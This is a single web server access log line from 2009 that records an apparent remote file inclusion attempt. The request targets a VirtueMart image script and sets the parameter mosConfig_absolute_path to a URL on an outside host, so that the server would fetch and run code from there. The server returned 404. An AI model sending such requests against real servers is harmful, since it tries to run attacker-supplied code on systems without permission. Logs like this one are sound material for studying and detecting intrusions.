66.207.172.166 - - [21/Sep/2009:03:38:58 -0700] "GET /logs/access.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://h1.ripway.com/Oluhuta/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
